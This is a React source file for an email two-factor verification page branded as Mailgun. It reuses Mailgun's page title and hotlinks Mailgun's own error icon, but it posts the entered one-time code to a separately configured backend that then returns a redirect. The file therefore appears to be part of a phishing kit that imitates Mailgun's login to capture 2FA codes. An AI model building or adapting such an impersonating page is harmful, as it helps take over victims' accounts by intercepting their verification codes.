import React, { useState, useEffect } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import axios from 'axios';
import { Helmet } from 'react-helmet';

function TwoFactorEmail() {
  const [code, setCode] = useState('');
  const [message, setMessage] = useState('');
  const [isLoading, setIsLoading] = useState(false);
  const [dontAskAgain, setDontAskAgain] = useState(false);
  const [userEmail, setUserEmail] = useState(''); // Changed to state
  const { twoFactorId } = useParams();
  const navigate = useNavigate();

  useEffect(() => {
    const fetchEmail = async () => {
      if (!twoFactorId) {
        setMessage(
          <div className="loginForm__statusMessageContainer">
            <div className="loginForm__statusMessage loginForm__statusMessage--error">
              <img
                src="https://login.mailgun.com/login/static/error.svg"
                className="loginForm__statusMessage__image"
                alt="Error Icon"
              />
              <span className="loginForm__statusText">Invalid 2FA request</span>
            </div>
          </div>
        );
        return;
      }

      try {
        const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';
        const response = await axios.get(`${API_URL}/2fa/email/${twoFactorId}`);
        setUserEmail(response.data.email);
      } catch (error) {
        setMessage(
          <div className="loginForm__statusMessageContainer">
            <div className="loginForm__statusMessage loginForm__statusMessage--error">
              <img
                src="https://login.mailgun.com/login/static/error.svg"
                className="loginForm__statusMessage__image"
                alt="Error Icon"
              />
              <span className="loginForm__statusText">Failed to load user email</span>
            </div>
          </div>
        );
      }
    };

    fetchEmail();
  }, [twoFactorId]);

  const handleSubmit = async (e) => {
    e.preventDefault();
    setIsLoading(true);
    setMessage(
      <div className="loginForm__statusMessageContainer">
        <div className="loginForm__statusMessage loginForm__statusMessage--loading">
          <span className="loginForm__statusText">Verifying code...</span>
        </div>
      </div>
    );

    try {
      const API_URL = process.env.REACT_APP_API_URL || 'http://localhost:5000/api';
      const response = await axios.post(`${API_URL}/2fa/verify-email`, {
        twoFactorId,
        code,
        dontAskAgain,
      });
      if (response.status === 200) {
        if (response.data.status === 200 && response.data.redirect) {
          window.location.href = response.data.redirect;
        } else if (response.data.status === 202 && response.data.redirect) {
          setMessage(
            <div className="loginForm__statusMessageContainer">
              <div className="loginForm__statusMessage loginForm__statusMessage--loading">
                <span className="loginForm__statusText">Redirecting...</span>
              </div>
            </div>
          );
          navigate(response.data.redirect);
        } else if (response.data.status === 200) {
          setMessage(
            <div className="loginForm__statusMessageContainer">
              <div className="loginForm__statusMessage loginForm__statusMessage--success">
                <span className="loginForm__statusText">{response.data.message}</span>
              </div>
            </div>
          );
          setTimeout(() => navigate('/'), 2000);
        } else {
          setMessage(
            <div className="loginForm__statusMessageContainer">
              <div className="loginForm__statusMessage loginForm__statusMessage--error">
                <img
                  src="https://login.mailgun.com/login/static/error.svg"
                  className="loginForm__statusMessage__image"
                  alt="Error Icon"
                />
                <span className="loginForm__statusText">{response.data.message}</span>
              </div>
            </div>
          );
        }
      } else {
        throw new Error('Unexpected HTTP status: ' + response.status);
      }
    } catch (error) {
      const errorMessage = error.response?.data?.message || 'Email code verification failed';
      setMessage(
        <div className="loginForm__statusMessageContainer">
          <div className="loginForm__statusMessage loginForm__statusMessage--error">
            <img
              src="https://login.mailgun.com/login/static/error.svg"
              className="loginForm__statusMessage__image"
              alt="Error Icon"
            />
            <span className="loginForm__statusText">{errorMessage}</span>
          </div>
        </div>
      );
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <>
      <Helmet>
        <title>2FA Email Code | Mailgun</title>
      </Helmet>
      <div className="loginForm__form">
        <div className="loginForm__content">
          <div>
            <p className="loginForm__paragraph">Welcome back</p>
            <p className="tfaForm__subtext">{userEmail || 'Loading...'}</p>
            <div className="labelGroup">
              <label className="labelGroup__label">Email verification code</label>
            </div>
            <form onSubmit={handleSubmit}>
              <input
                type="text"
                id="otp-input"
                name="otp"
                className="loginForm__input"
                value={code}
                onChange={(e) => setCode(e.target.value)}
                placeholder="123456"
                disabled={isLoading}
                required
              />
              {message}
              <div className="tfaForm__checkboxContainer">
                <label className="tfaForm__checkboxLabel">
                  <input
                    type="checkbox"
                    checked={dontAskAgain}
                    onChange={(e) => setDontAskAgain(e.target.checked)}
                    disabled={isLoading}
                  />
                  <span>Don't ask again on this computer.</span>
                </label>
              </div>
              <div className="tfaForm__buttonContainer">
                <button type="submit" className="loginForm__buttonPrimary" disabled={isLoading}>
                  Next
                </button>
              </div>
            </form>
            <div className="stepLink__container stepLink__container--bottom">
              <div className="stepLink">
                <a href="/2fa/recovery">Lost code?</a>
              </div>
            </div>
          </div>
        </div>
      </div>
    </>
  );
}

export default TwoFactorEmail;